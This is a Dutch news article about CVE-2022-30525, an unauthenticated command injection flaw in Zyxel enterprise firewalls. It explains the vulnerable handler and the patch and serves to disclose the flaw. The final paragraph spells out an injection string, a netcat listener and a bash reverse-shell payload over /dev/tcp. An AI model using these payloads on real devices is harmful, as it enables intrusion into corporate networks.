Er is een kritieke kwetsbaarheid (CVE-2022-30525) geïdentificeerd in Zyxel-apparaten uit de ATP-, VPN- en USG FLEX-serie, ontworpen om de werking van firewalls, IDS en VPN in ondernemingen te organiseren, waardoor een externe aanvaller code kan uitvoeren op de apparaat zonder gebruikersrechten zonder authenticatie. Om een aanval uit te kunnen voeren, moet een aanvaller verzoeken naar het apparaat kunnen sturen via het HTTP/HTTPS-protocol. Zyxel heeft de kwetsbaarheid verholpen in de ZLD 5.30 firmware-update. Volgens de Shodan-service zijn er momenteel 16213 potentieel kwetsbare apparaten op het wereldwijde netwerk die verzoeken via HTTP/HTTPS accepteren.
De bediening wordt uitgevoerd door speciaal ontworpen opdrachten naar de webhandler /ztp/cgi-bin/handler te sturen, toegankelijk zonder authenticatie. Het probleem wordt veroorzaakt door het ontbreken van een goede opschoning van aanvraagparameters bij het uitvoeren van opdrachten op het systeem met behulp van de aanroep os.system die wordt gebruikt in de bibliotheek lib_wan_settings.py en wordt uitgevoerd bij het verwerken van de setWanPortSt-bewerking.
Een aanvaller kan bijvoorbeeld de tekenreeks “; ping 192.168.1.210;" wat zal leiden tot de uitvoering van de opdracht “ping 192.168.1.210” op het systeem. Om toegang te krijgen tot de opdrachtshell, kunt u “nc -lvnp 1270” op uw systeem uitvoeren en vervolgens een omgekeerde verbinding tot stand brengen door een verzoek naar het apparaat te sturen met de '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Bron: opennet.ru